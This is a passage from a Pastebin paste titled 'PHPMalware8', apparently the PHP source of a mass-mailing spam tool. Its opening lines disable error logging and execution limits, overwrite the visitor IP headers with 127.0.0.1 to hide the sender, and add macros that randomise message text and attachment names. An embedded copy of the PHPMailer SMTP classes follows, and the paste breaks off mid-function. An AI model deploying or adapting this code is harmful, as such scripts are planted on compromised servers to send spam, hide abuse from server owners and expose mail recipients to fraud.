FlyFar

PHPMalware8

Feb 8th, 2024
195
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 110.18 KB | Cybersecurity | 0 0
  1. @ini_set('error_log', NULL);
  2. @ini_set('log_errors', 0);
  3. @ini_set('max_execution_time', 0);
  4. @set_time_limit(0);
  5.  
  6. if(isset($_SERVER))
  7. {
  8.     $_SERVER['PHP_SELF'] = "/";
  9.     $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
  10.     if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
  11.     {
  12.         $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
  13.     }
  14. }
  15. if(isset($_FILES))
  16. {
  17.     foreach($_FILES as $key => $file)
  18.     {
  19.         if(!strpos($file['name'], ".jpg"))
  20.         {
  21.             $filename = alter_macros($file['name']);
  22.             $filename = num_macros($filename);
  23.             $filename = xnum_macros($filename);
  24.             $_FILES[$key]["name"] = $filename;
  25.         }
  26.     }
  27. }
  28.  
  29. function custom_strip_tags($text)
  30. {
  31.     $text = strip_tags($text, '<a>');
  32.     $text = str_replace("<a href=\"", "[ ", $text);
  33.     $text = str_replace("</a>", "", $text);
  34.     $text = str_replace("\">", " ] ", $text);
  35.     return $text;
  36. }
  37. function is_ip($str) {
  38.   return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
  39. }
  40. function from_host($content)
  41. {
  42.     $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
  43.     if (is_ip($host))
  44.     {
  45.         return $content;
  46.     }
  47.  
  48.     $tokens = explode("@", $content);
  49.     $content = $tokens[0] . "@" . $host . ">";
  50.     return $content;
  51. }
  52. function alter_macros($content)
  53. {
  54.     preg_match_all('#{(.*)}#Ui', $content, $matches);
  55.     for($i = 0; $i < count($matches[1]); $i++)
  56.     {
  57.         $ns = explode("|", $matches[1][$i]);
  58.         $c2 = count($ns);
  59.         $rand = rand(0, ($c2 - 1));
  60.         $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
  61.     }
  62.     return $content;
  63. }
  64.  
  65. function xnum_macros($content)
  66. {
  67.     preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
  68.     for($i = 0; $i < count($matches[0]); $i++)
  69.     {
  70.         $num = $matches[1][$i];
  71.         $min = pow(10, $num - 1);
  72.         $max = pow(10, $num) - 1;
  73.         $rand = rand($min, $max);
  74.         $content = str_replace($matches[0][$i], $rand, $content);
  75.     }
  76.     return $content;
  77. }
  78. function num_macros($content)
  79. {
  80.     preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
  81.     for($i = 0; $i < count($matches[0]); $i++)
  82.     {
  83.         $min = $matches[1][$i];
  84.         $max = $matches[2][$i];
  85.         $rand = rand($min, $max);
  86.         $content = str_replace($matches[0][$i], $rand, $content);
  87.     }
  88.     return $content;
  89. }
  90.  
  91. function fteil_macros($content, $fteil)
  92. {
  93.     return str_replace("[FTEIL]", $fteil, $content);
  94. }
  95. class SMTP
  96. {
  97.     const VERSION = '5.2.10';
  98.     const CRLF = "\r\n";
  99.     const DEFAULT_SMTP_PORT = 25;
  100.     const MAX_LINE_LENGTH = 998;
  101.     const DEBUG_OFF = 0;
  102.     const DEBUG_CLIENT = 1;
  103.     const DEBUG_SERVER = 2;
  104.     const DEBUG_CONNECTION = 3;
  105.     const DEBUG_LOWLEVEL = 4;
  106.     public $Version = '5.2.10';
  107.     public $SMTP_PORT = 25;
  108.     public $CRLF = "\r\n";
  109.     public $do_debug = self::DEBUG_OFF;
  110.     public $Debugoutput = 'echo';
  111.     public $do_verp = false;
  112.     public $Timeout = 300;
  113.     public $Timelimit = 300;
  114.     protected $smtp_conn;
  115.     protected $error = array(
  116.         'error' => '',
  117.         'detail' => '',
  118.         'smtp_code' => '',
  119.         'smtp_code_ex' => ''
  120.     );
  121.     protected $helo_rply = null;
  122.     protected $server_caps = null;
  123.     protected $last_reply = '';
  124.     protected function edebug($str, $level = 0)
  125.     {
  126.         if ($level > $this->do_debug) {
  127.             return;
  128.         }
  129.         if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
  130.             call_user_func($this->Debugoutput, $str, $this->do_debug);
  131.             return;
  132.         }
  133.         switch ($this->Debugoutput) {
  134.             case 'error_log':
  135.                 error_log($str);
  136.                 break;
  137.             case 'html':
  138.                 echo htmlentities(
  139.                     preg_replace('/[\r\n]+/', '', $str),
  140.                     ENT_QUOTES,
  141.                     'UTF-8'
  142.                 )
  143.                 . "<br>\n";
  144.                 break;
  145.             case 'echo':
  146.             default:
  147.                 $str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
  148.                 echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
  149.                     "\n",
  150.                     "\n                   \t                  ",
  151.                     trim($str)
  152.                 )."\n";
  153.         }
  154.     }
  155.     public function connect($host, $port = null, $timeout = 30, $options = array())
  156.     {
  157.         static $streamok;
  158.         if (is_null($streamok)) {
  159.             $streamok = function_exists('stream_socket_client');
  160.         }
  161.         $this->setError('');
  162.         if ($this->connected()) {
  163.             $this->setError('Already connected to a server');
  164.             return false;
  165.         }
  166.         if (empty($port)) {
  167.             $port = self::DEFAULT_SMTP_PORT;
  168.         }
  169.         $this->edebug(
  170.             "Connection: opening to $host:$port, timeout=$timeout, options=".var_export($options, true),
  171.             self::DEBUG_CONNECTION
  172.         );
  173.         $errno = 0;
  174.         $errstr = '';
  175.         if ($streamok) {
  176.             $socket_context = stream_context_create($options);
  177.             $this->smtp_conn = @stream_socket_client(
  178.                 $host . ":" . $port,
  179.                 $errno,
  180.                 $errstr,
  181.                 $timeout,
  182.                 STREAM_CLIENT_CONNECT,
  183.                 $socket_context
  184.             );
  185.         } else {
  186.             $this->edebug(
  187.                 "Connection: stream_socket_client not available, falling back to fsockopen",
  188.                 self::DEBUG_CONNECTION
  189.             );
  190.             $this->smtp_conn = fsockopen(
  191.                 $host,
  192.                 $port,
  193.                 $errno,
  194.                 $errstr,
  195.                 $timeout
  196.             );
  197.         }
  198.         if (!is_resource($this->smtp_conn)) {
  199.             $this->setError(
  200.                 'Failed to connect to server',
  201.                 $errno,
  202.                 $errstr
  203.             );
  204.             $this->edebug(
  205.                 'SMTP ERROR: ' . $this->error['error']
  206.                 . ": $errstr ($errno)",
  207.                 self::DEBUG_CLIENT
  208.             );
  209.             return false;
  210.         }
  211.         $this->edebug('Connection: opened', self::DEBUG_CONNECTION);
  212.         if (substr(PHP_OS, 0, 3) != 'WIN') {
  213.             $max = ini_get('max_execution_time');
  214.             if ($max != 0 && $timeout > $max) {
  215.                 @set_time_limit($timeout);
  216.             }
  217.             stream_set_timeout($this->smtp_conn, $timeout, 0);
  218.         }
  219.         $announce = $this->get_lines();
  220.         $this->edebug('SERVER -> CLIENT: ' . $announce, self::DEBUG_SERVER);
  221.         return true;
  222.     }
  223.     public function startTLS()
  224.     {
  225.         if (!$this->sendCommand('STARTTLS', 'STARTTLS', 220)) {
  226.             return false;
  227.         }
  228.         if (!stream_socket_enable_crypto(
  229.             $this->smtp_conn,
  230.             true,
  231.             STREAM_CRYPTO_METHOD_TLS_CLIENT
  232.         )) {
  233.             return false;
  234.         }
  235.         return true;
  236.     }
  237.     public function authenticate(
  238.         $username,
  239.         $password,
  240.         $authtype = null,
  241.         $realm = '',
  242.         $workstation = ''
  243.     ) {
  244.         if (!$this->server_caps) {
  245.             $this->setError('Authentication is not allowed before HELO/EHLO');
  246.             return false;
  247.         }
  248.         if (array_key_exists('EHLO', $this->server_caps)) {
  249.             if (!array_key_exists('AUTH', $this->server_caps)) {
  250.                 $this->setError('Authentication is not allowed at this stage');
  251.                 return false;
  252.             }
  253.             self::edebug('Auth method requested: ' . ($authtype ? $authtype : 'UNKNOWN'), self::DEBUG_LOWLEVEL);
  254.             self::edebug(
  255.                 'Auth methods available on the server: ' . implode(',', $this->server_caps['AUTH']),
  256.                 self::DEBUG_LOWLEVEL
  257.             );
  258.             if (empty($authtype)) {
  259.                 foreach (array('LOGIN', 'CRAM-MD5', 'NTLM', 'PLAIN') as $method) {
  260.                     if (in_array($method, $this->server_caps['AUTH'])) {
  261.                         $authtype = $method;
  262.                         break;
  263.                     }
  264.                 }
  265.                 if (empty($authtype)) {
  266.                     $this->setError('No supported authentication methods found');
  267.                     return false;
  268.                 }
  269.                 self::edebug('Auth method selected: '.$authtype, self::DEBUG_LOWLEVEL);
  270.             }
  271.             if (!in_array($authtype, $this->server_caps['AUTH'])) {
  272.                 $this->setError("The requested authentication method \"$authtype\" is not supported by the server");
  273.                 return false;
  274.             }
  275.         } elseif (empty($authtype)) {
  276.             $authtype = 'LOGIN';
  277.         }
  278.         switch ($authtype) {
  279.             case 'PLAIN':
  280.                 if (!$this->sendCommand('AUTH', 'AUTH PLAIN', 334)) {
  281.                     return false;
  282.                 }
  283.                 if (!$this->sendCommand(
  284.                     'User & Password',
  285.                     base64_encode("\0" . $username . "\0" . $password),
  286.                     235
  287.                 )
  288.                 ) {
  289.                     return false;
  290.                 }
  291.                 break;
  292.             case 'LOGIN':
  293.                 if (!$this->sendCommand('AUTH', 'AUTH LOGIN', 334)) {
  294.                     return false;
  295.                 }
  296.                 if (!$this->sendCommand("Username", base64_encode($username), 334)) {
  297.                     return false;
  298.                 }
  299.                 if (!$this->sendCommand("Password", base64_encode($password), 235)) {
  300.                     return false;
  301.                 }
  302.                 break;
  303.             case 'NTLM':
  304.                 require_once 'extras/ntlm_sasl_client.php';
  305.                 $temp = new stdClass;
  306.                 $ntlm_client = new ntlm_sasl_client_class;
  307.                 if (!$ntlm_client->Initialize($temp)) {
  308.                     $this->setError($temp->error);
  309.                     $this->edebug(
  310.                         'You need to enable some modules in your php.ini file: '
  311.                         . $this->error['error'],
  312.                         self::DEBUG_CLIENT
  313.                     );
  314.                     return false;
  315.                 }
  316.                 $msg1 = $ntlm_client->TypeMsg1($realm, $workstation); //msg1
  317.                 if (!$this->sendCommand(
  318.                     'AUTH NTLM',
  319.                     'AUTH NTLM ' . base64_encode($msg1),
  320.                     334
  321.                 )
  322.                 ) {
  323.                     return false;
  324.                 }
  325.                 $challenge = substr($this->last_reply, 3);
  326.                 $challenge = base64_decode($challenge);
  327.                 $ntlm_res = $ntlm_client->NTLMResponse(
  328.                     substr($challenge, 24, 8),
  329.                     $password
  330.                 );
  331.                 $msg3 = $ntlm_client->TypeMsg3(
  332.                     $ntlm_res,
  333.                     $username,
  334.                     $realm,
  335.                     $workstation
  336.                 );
  337.                 return $this->sendCommand('Username', base64_encode($msg3), 235);
  338.             case 'CRAM-MD5':
  339.                 if (!$this->sendCommand('AUTH CRAM-MD5', 'AUTH CRAM-MD5', 334)) {
  340.                     return false;
  341.                 }
  342.                 $challenge = base64_decode(substr($this->last_reply, 4));
  343.                 $response = $username . ' ' . $this->hmac($challenge, $password);
  344.                 return $this->sendCommand('Username', base64_encode($response), 235);
  345.             default:
  346.                 $this->setError("Authentication method \"$authtype\" is not supported");
  347.                 return false;
  348.         }
  349.         return true;
  350.     }
  351.     protected function hmac($data, $key)
  352.     {
  353.         if (function_exists('hash_hmac')) {
  354.             return hash_hmac('md5', $data, $key);
  355.         }
  356.         $bytelen = 64; // byte length for md5
  357.         if (strlen($key) > $bytelen) {
  358.             $key = pack('H*', md5($key));
  359.         }
  360.         $key = str_pad($key, $bytelen, chr(0x00));
  361.         $ipad = str_pad('', $bytelen, chr(0x36));
  362.         $opad = str_pad('', $bytelen, chr(0x5c));
  363.         $k_ipad = $key ^ $ipad;
  364.         $k_opad = $key ^ $opad;
  365.         return md5($k_opad . pack('H*', md5($k_ipad . $data)));
  366.     }
  367.     public function connected()
  368.     {
  369.         if (is_resource($this->smtp_conn)) {
  370.             $sock_status = stream_get_meta_data($this->smtp_conn);
  371.             if ($sock_status['eof']) {
  372.                 $this->edebug(
  373.                     'SMTP NOTICE: EOF caught while checking if connected',
  374.                     self::DEBUG_CLIENT
  375.                 );
  376.                 $this->close();
  377.                 return false;
  378.             }
  379.             return true; // everything looks good
  380.         }
  381.         return false;
  382.     }
  383.     public function close()
  384.     {
  385.         $this->setError('');
  386.         $this->server_caps = null;
  387.         $this->helo_rply = null;
  388.         if (is_resource($this->smtp_conn)) {
  389.             fclose($this->smtp_conn);
  390.             $this->smtp_conn = null; //Makes for cleaner serialization
  391.             $this->edebug('Connection: closed', self::DEBUG_CONNECTION);
  392.         }
  393.     }
  394.     public function data($msg_data)
  395.     {
  396.         if (!$this->sendCommand('DATA', 'DATA', 354)) {
  397.             return false;
  398.         }
  399.         $lines = explode("\n", str_replace(array("\r\n", "\r"), "\n", $msg_data));
  400.         $field = substr($lines[0], 0, strpos($lines[0], ':'));
  401.         $in_headers = false;
  402.         if (!empty($field) && strpos($field, ' ') === false) {
  403.             $in_headers = true;
  404.         }
  405.         foreach ($lines as $line) {
  406.             $lines_out = array();
  407.             if ($in_headers and $line == '') {
  408.                 $in_headers = false;
  409.             }
  410.             while (isset($line[self::MAX_LINE_LENGTH])) {
  411.                 $pos = strrpos(substr($line, 0, self::MAX_LINE_LENGTH), ' ');
  412.                 if (!$pos) {
  413.                     $pos = self::MAX_LINE_LENGTH - 1;
  414.                     $lines_out[] = substr($line, 0, $pos);
  415.                     $line = substr($line, $pos);
  416.                 } else {
  417.                     $lines_out[] = substr($line, 0, $pos);
  418.                     $line = substr($line, $pos + 1);
  419.                 }
  420.                 if ($in_headers) {
  421.                     $line = "\t" . $line;
  422.                 }
  423.             }
  424.             $lines_out[] = $line;
  425.             foreach ($lines_out as $line_out) {
  426.                 if (!empty($line_out) and $line_out[0] == '.') {
  427.                     $line_out = '.' . $line_out;
  428.                 }
  429.                 $this->client_send($line_out . self::CRLF);
  430.             }
  431.         }
  432.         $savetimelimit = $this->Timelimit;
  433.         $this->Timelimit = $this->Timelimit * 2;
  434.         $result = $this->sendCommand('DATA END', '.', 250);
  435.         $this->Timelimit = $savetimelimit;
  436.         return $result;
  437.     }
  438.     public function hello($host = '')
  439.     {
  440.         return (boolean)($this->sendHello('EHLO', $host) or $this->sendHello('HELO', $host));
  441.     }
  442.     protected function sendHello($hello, $host)
  443.     {
  444.         $noerror = $this->sendCommand($hello, $hello . ' ' . $host, 250);
  445.         $this->helo_rply = $this->last_reply;
  446.         if ($noerror) {
  447.             $this->parseHelloFields($hello);
  448.         } else {
  449.             $this->server_caps = null;
  450.         }
  451.         return $noerror;
  452.     }
  453.     protected function parseHelloFields($type)
  454.     {
  455.         $this->server_caps = array();
  456.         $lines = explode("\n", $this->last_reply);
  457.         foreach ($lines as $n => $s) {
  458.             $s = trim(substr($s, 4));
  459.             if (!$s) {
  460.                 continue;
  461.             }
  462.             $fields = explode(' ', $s);
  463.             if (!empty($fields)) {
  464.                 if (!$n) {
  465.                     $name = $type;
  466.                     $fields = $fields[0];
  467.                 } else {
  468.                     $name = array_shift($fields);
  469.                     if ($name == 'SIZE') {
  470.                         $fields = ($fields) ? $fields[0] : 0;
  471.                     }
  472.                 }
  473.                 $this->server_caps[$name] = ($fields ? $fields : true);
  474.             }
  475.         }
  476.     }
  477.     public function mail($from)
  478.     {
  479.         $useVerp = ($this->do_verp ? ' XVERP' : '');
  480.         return $this->sendCommand(
  481.             'MAIL FROM',
  482.             'MAIL FROM:<' . $from . '>' . $useVerp,
  483.             250
  484.         );
  485.     }
  486.     public function quit($close_on_error = true)
  487.     {
  488.         $noerror = $this->sendCommand('QUIT', 'QUIT', 221);
  489.         $err = $this->error; //Save any error
  490.         if ($noerror or $close_on_error) {
  491.             $this->close();
  492.             $this->error = $err; //Restore any error from the quit command
  493.         }
  494.         return $noerror;
  495.     }
  496.     public function recipient($toaddr)
  497.     {
  498.         return $this->sendCommand(
  499.             'RCPT TO',
  500.             'RCPT TO:<' . $toaddr . '>',
  501.             array(250, 251)
  502.         );
  503.     }
  504.     public function reset()
  505.     {
  506.         return $this->sendCommand('RSET', 'RSET', 250);
  507.     }
  508.     protected function sendCommand($command, $commandstring, $expect)
  509.     {
  510.         if (!$this->connected()) {
  511.             $this->setError("Called $command without being connected");
  512.             return false;
  513.         }
  514.         $this->client_send($commandstring . self::CRLF);
  515.         $this->last_reply = $this->get_lines();
  516.         $matches = array();
  517.         if (preg_match("/^([0-9]{3})[ -](?:([0-9]\\.[0-9]\\.[0-9]) )?/", $this->last_reply, $matches)) {
  518.             $code = $matches[1];
  519.             $code_ex = (count($matches) > 2 ? $matches[2] : null);
  520.             $detail = preg_replace(
  521.                 "/{$code}[ -]".($code_ex ? str_replace('.', '\\.', $code_ex).' ' : '')."/m",
  522.                 '',
  523.                 $this->last_reply
  524.             );
  525.         } else {
  526.             $code = substr($this->last_reply, 0, 3);
  527.             $code_ex = null;
  528.             $detail = substr($this->last_reply, 4);
  529.         }
  530.         $this->edebug('SERVER -> CLIENT: ' . $this->last_reply, self::DEBUG_SERVER);
  531.         if (!in_array($code, (array)$expect)) {
  532.             $this->setError(
  533.                 "$command command failed",
  534.                 $detail,
  535.                 $code,
  536.                 $code_ex
  537.             );
  538.             $this->edebug(
  539.                 'SMTP ERROR: ' . $this->error['error'] . ': ' . $this->last_reply,
  540.                 self::DEBUG_CLIENT
  541.             );
  542.             return false;
  543.         }
  544.         $this->setError('');
  545.         return true;
  546.     }
  547.     public function sendAndMail($from)
  548.     {
  549.         return $this->sendCommand('SAML', "SAML FROM:$from", 250);
  550.     }
  551.     public function verify($name)
  552.     {
  553.         return $this->sendCommand('VRFY', "VRFY $name", array(250, 251));
  554.     }
  555.     public function noop()
  556.     {
  557.         return $this->sendCommand('NOOP', 'NOOP', 250);
  558.     }
  559.     public function turn()
  560.     {
  561.         $this->setError('The SMTP TURN command is not implemented');
  562.         $this->edebug('SMTP NOTICE: ' . $this->error['error'], self::DEBUG_CLIENT);
  563.         return false;
  564.     }
  565.     public function client_send($data)
  566.     {
  567.         $this->edebug("CLIENT -> SERVER: $data", self::DEBUG_CLIENT);
  568.         return fwrite($this->smtp_conn, $data);
  569.     }
  570.     public function getError()
  571.     {
  572.         return $this->error;
  573.     }
  574.     public function getServerExtList()
  575.     {
  576.         return $this->server_caps;
  577.     }
  578.     public function getServerExt($name)
  579.     {
  580.         if (!$this->server_caps) {
  581.             $this->setError('No HELO/EHLO was sent');
  582.             return null;
  583.         }
  584.         // the tight logic knot ;)
  585.         if (!array_key_exists($name, $this->server_caps)) {
  586.             if ($name == 'HELO') {
  587.                 return $this->server_caps['EHLO'];
  588.             }
  589.             if ($name == 'EHLO' || array_key_exists('EHLO', $this->server_caps)) {
  590.                 return false;
  591.             }
  592.             $this->setError('HELO handshake was used. Client knows nothing about server extensions');
  593.             return null;
  594.         }
  595.         return $this->server_caps[$name];
  596.     }
  597.     public function getLastReply()
  598.     {
  599.         return $this->last_reply;
  600.     }
  601.     protected function get_lines()
  602.     {
  603.         if (!is_resource($this->smtp_conn)) {
  604.             return '';
  605.         }
  606.         $data = '';
  607.         $endtime = 0;
  608.         stream_set_timeout($this->smtp_conn, $this->Timeout);
  609.         if ($this->Timelimit > 0) {
  610.             $endtime = time() + $this->Timelimit;
  611.         }
  612.         while (is_resource($this->smtp_conn) && !feof($this->smtp_conn)) {
  613.             $str = @fgets($this->smtp_conn, 515);
  614.             $this->edebug("SMTP -> get_lines(): \$data was \"$data\"", self::DEBUG_LOWLEVEL);
  615.             $this->edebug("SMTP -> get_lines(): \$str is \"$str\"", self::DEBUG_LOWLEVEL);
  616.             $data .= $str;
  617.             $this->edebug("SMTP -> get_lines(): \$data is \"$data\"", self::DEBUG_LOWLEVEL);
  618.             if ((isset($str[3]) and $str[3] == ' ')) {
  619.                 break;
  620.             }
  621.             $info = stream_get_meta_data($this->smtp_conn);
  622.             if ($info['timed_out']) {
  623.                 $this->edebug(
  624.                     'SMTP -> get_lines(): timed-out (' . $this->Timeout . ' sec)',
  625.                     self::DEBUG_LOWLEVEL
  626.                 );
  627.                 break;
  628.             }
  629.             if ($endtime and time() > $endtime) {
  630.                 $this->edebug(
  631.                     'SMTP -> get_lines(): timelimit reached ('.
  632.                     $this->Timelimit . ' sec)',
  633.                     self::DEBUG_LOWLEVEL
  634.                 );
  635.                 break;
  636.             }
  637.         }
  638.         return $data;
  639.     }
  640.     public function setVerp($enabled = false)
  641.     {
  642.         $this->do_verp = $enabled;
  643.     }
  644.     public function getVerp()
  645.     {
  646.         return $this->do_verp;
  647.     }
  648.     protected function setError($message, $detail = '', $smtp_code = '', $smtp_code_ex = '')
  649.     {
  650.         $this->error = array(
  651.             'error' => $message,
  652.             'detail' => $detail,
  653.             'smtp_code' => $smtp_code,
  654.             'smtp_code_ex' => $smtp_code_ex
  655.         );
  656.     }
  657.     public function setDebugOutput($method = 'echo')
  658.     {
  659.         $this->Debugoutput = $method;
  660.     }
  661.     public function getDebugOutput()
  662.     {
  663.         return $this->Debugoutput;
  664.     }
  665.     public function setDebugLevel($level = 0)
  666.     {
  667.         $this->do_debug = $level;
  668.     }
  669.     public function getDebugLevel()
  670.     {
  671.         return $this->do_debug;
  672.     }
  673.     public function setTimeout($timeout = 0)
  674.     {
  675.         $this->Timeout = $timeout;
  676.     }
  677.     public function getTimeout()
  678.     {
  679.         return $this->Timeout;
  680.     }
  681. }
  682. class PHPMailer
  683. {
  684.     public $Version = '5.2.9';
  685.     public $Priority = 3;
  686.     public $CharSet = 'iso-8859-1';
  687.     public $ContentType = 'text/plain';
  688.     public $Encoding = '8bit';
  689.     public $ErrorInfo = '';
  690.     public $From = 'root@localhost';
  691.     public $FromName = 'Root User';
  692.     public $Sender = '';
  693.     public $ReturnPath = '';
  694.     public $Subject = '';
  695.     public $Body = '';
  696.     public $AltBody = '';
  697.     public $Ical = '';
  698.     protected $MIMEBody = '';
  699.     protected $MIMEHeader = '';
  700.     protected $mailHeader = '';
  701.     public $WordWrap = 0;
  702.     public $Mailer = 'mail';
  703.     public $Sendmail = '/usr/sbin/sendmail';
  704.     public $UseSendmailOptions = true;
  705.     public $PluginDir = '';
  706.     public $ConfirmReadingTo = '';
  707.     public $Hostname = '';
  708.     public $MessageID = '';
  709.     public $MessageDate = '';
  710.     public $Host = 'localhost';
  711.     public $Port = 25;
  712.     public $Helo = '';
  713.     public $SMTPSecure = '';
  714.     public $SMTPAuth = false;
  715.     public $Username = '';
  716.     public $Password = '';
  717.     public $AuthType = '';
  718.     public $Realm = '';
  719.     public $Workstation = '';
  720.     public $Timeout = 300;
  721.     public $SMTPDebug = 0;
  722.     public $Debugoutput = 'echo';
  723.     public $SMTPKeepAlive = false;
  724.     public $SingleTo = false;
  725.     public $SingleToArray = array();
  726.     public $do_verp = false;
  727.     public $AllowEmpty = false;
  728.     public $LE = "\n";
  729.     public $DKIM_selector = '';
  730.     public $DKIM_identity = '';
  731.     public $DKIM_passphrase = '';
  732.     public $DKIM_domain = '';
  733.     public $DKIM_private = '';
  734.     public $action_function = '';
  735.     public $XMailer = '';
  736.     protected $smtp = null;
  737.     protected $to = array();
  738.     protected $cc = array();
  739.     protected $bcc = array();
  740.     protected $ReplyTo = array();
  741.     protected $all_recipients = array();
  742.     protected $attachment = array();
  743.     protected $CustomHeader = array();
  744.     protected $lastMessageID = '';
  745.     protected $message_type = '';
  746.     protected $boundary = array();
  747.     protected $language = array();
  748.     protected $error_count = 0;
  749.     protected $sign_cert_file = '';
  750.     protected $sign_key_file = '';
  751.     protected $sign_key_pass = '';
  752.     protected $exceptions = false;
  753.     const STOP_MESSAGE = 0;
  754.     const STOP_CONTINUE = 1;
  755.     const STOP_CRITICAL = 2;
  756.     const CRLF = "\r\n";
  757.     public function __construct($exceptions = false)
  758.     {
  759.         $this->exceptions = (boolean)$exceptions;
  760.     }
  761.     public function __destruct()
  762.     {
  763.     }
  764.     private function mailPassthru($to, $subject, $body, $header, $params)
  765.     {
  766.         //Check overloading of mail function to avoid double-encoding
  767.         if (ini_get('mbstring.func_overload') & 1) {
  768.             $subject = $this->secureHeader($subject);
  769.         } else {
  770.             $subject = $this->encodeHeader($this->secureHeader($subject));
  771.         }
  772.         if (ini_get('safe_mode') || !($this->UseSendmailOptions)) {
  773.             $result = @mail($to, $subject, $body, $header);
  774.         } else {
  775.             $result = @mail($to, $subject, $body, $header, $params);
  776.         }
  777.         return $result;
  778.     }
  779.     protected function edebug($str)
  780.     {
  781.         if ($this->SMTPDebug <= 0) {
  782.             return;
  783.         }
  784.         //Avoid clash with built-in function names
  785.         if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
  786.             call_user_func($this->Debugoutput, $str, $this->SMTPDebug);
  787.             return;
  788.         }
  789.         switch ($this->Debugoutput) {
  790.             case 'error_log':
  791.                 //Don't output, just log
  792.                 error_log($str);
  793.                 break;
  794.             case 'html':
  795.                 //Cleans up output a bit for a better looking, HTML-safe output
  796.                 echo htmlentities(
  797.                     preg_replace('/[\r\n]+/', '', $str),
  798.                     ENT_QUOTES,
  799.                     'UTF-8'
  800.                 )
  801.                 . "<br>\n";
  802.                 break;
  803.             case 'echo':
  804.             default:
  805.                 //Normalize line breaks
  806.                 $str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
  807.                 echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
  808.                     "\n",
  809.                     "\n                   \t                  ",
  810.                     trim($str)
  811.                 ) . "\n";
  812.         }
  813.     }
  814.     public function isHTML($isHtml = true)
  815.     {
  816.         if ($isHtml) {
  817.             $this->ContentType = 'text/html';
  818.         } else {
  819.             $this->ContentType = 'text/plain';
  820.         }
  821.     }
  822.     public function isSMTP()
  823.     {
  824.         $this->Mailer = 'smtp';
  825.     }
  826.     public function isMail()
  827.     {
  828.         $this->Mailer = 'mail';
  829.     }
  830.     public function isSendmail()
  831.     {
  832.         $ini_sendmail_path = ini_get('sendmail_path');
  833.         if (!stristr($ini_sendmail_path, 'sendmail')) {
  834.             $this->Sendmail = '/usr/sbin/sendmail';
  835.         } else {
  836.             $this->Sendmail = $ini_sendmail_path;
  837.         }
  838.         $this->Mailer = 'sendmail';
  839.     }
  840.     public function isQmail()
  841.     {
  842.         $ini_sendmail_path = ini_get('sendmail_path');
  843.         if (!stristr($ini_sendmail_path, 'qmail')) {
  844.             $this->Sendmail = '/var/qmail/bin/qmail-inject';
  845.         } else {
  846.             $this->Sendmail = $ini_sendmail_path;
  847.         }
  848.         $this->Mailer = 'qmail';
  849.     }
  850.     public function addAddress($address, $name = '')
  851.     {
  852.         return $this->addAnAddress('to', $address, $name);
  853.     }
  854.     public function addCC($address, $name = '')
  855.     {
  856.         return $this->addAnAddress('cc', $address, $name);
  857.     }
  858.     public function addBCC($address, $name = '')
  859.     {
  860.         return $this->addAnAddress('bcc', $address, $name);
  861.     }
  862.     public function addReplyTo($address, $name = '')
  863.     {
  864.         return $this->addAnAddress('Reply-To', $address, $name);
  865.     }
  866.     protected function addAnAddress($kind, $address, $name = '')
  867.     {
  868.         if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) {
  869.             $this->setError($this->lang('Invalid recipient array') . ': ' . $kind);
  870.             $this->edebug($this->lang('Invalid recipient array') . ': ' . $kind);
  871.             if ($this->exceptions) {
  872.                 throw new phpmailerException('Invalid recipient array: ' . $kind);
  873.             }
  874.             return false;
  875.         }
  876.         $address = trim($address);
  877.         $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
  878.         if (!$this->validateAddress($address)) {
  879.             $this->setError($this->lang('invalid_address') . ': ' . $address);
  880.             $this->edebug($this->lang('invalid_address') . ': ' . $address);
  881.             if ($this->exceptions) {
  882.                 throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
  883.             }
  884.             return false;
  885.         }
  886.         if ($kind != 'Reply-To') {
  887.             if (!isset($this->all_recipients[strtolower($address)])) {
  888.                 array_push($this->$kind, array($address, $name));
  889.                 $this->all_recipients[strtolower($address)] = true;
  890.                 return true;
  891.             }
  892.         } else {
  893.             if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
  894.                 $this->ReplyTo[strtolower($address)] = array($address, $name);
  895.                 return true;
  896.             }
  897.         }
  898.         return false;
  899.     }
  900.     public function setFrom($address, $name = '', $auto = true)
  901.     {
  902.         $address = trim($address);
  903.         $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
  904.         if (!$this->validateAddress($address)) {
  905.             $this->setError($this->lang('invalid_address') . ': ' . $address);
  906.             $this->edebug($this->lang('invalid_address') . ': ' . $address);
  907.             if ($this->exceptions) {
  908.                 throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
  909.             }
  910.             return false;
  911.         }
  912.         $this->From = $address;
  913.         $this->FromName = $name;
  914.         if ($auto) {
  915.             if (empty($this->Sender)) {
  916.                 $this->Sender = $address;
  917.             }
  918.         }
  919.         return true;
  920.     }
  921.     public function getLastMessageID()
  922.     {
  923.         return $this->lastMessageID;
  924.     }
  925.     public static function validateAddress($address, $patternselect = 'auto')
  926.     {
  927.         if (!$patternselect or $patternselect == 'auto') {
  928.             //Check this constant first so it works when extension_loaded() is disabled by safe mode
  929.             //Constant was added in PHP 5.2.4
  930.             if (defined('PCRE_VERSION')) {
  931.                 //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2
  932.                 if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
  933.                     $patternselect = 'pcre8';
  934.                 } else {
  935.                     $patternselect = 'pcre';
  936.                 }
  937.             } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
  938.                 //Fall back to older PCRE
  939.                 $patternselect = 'pcre';
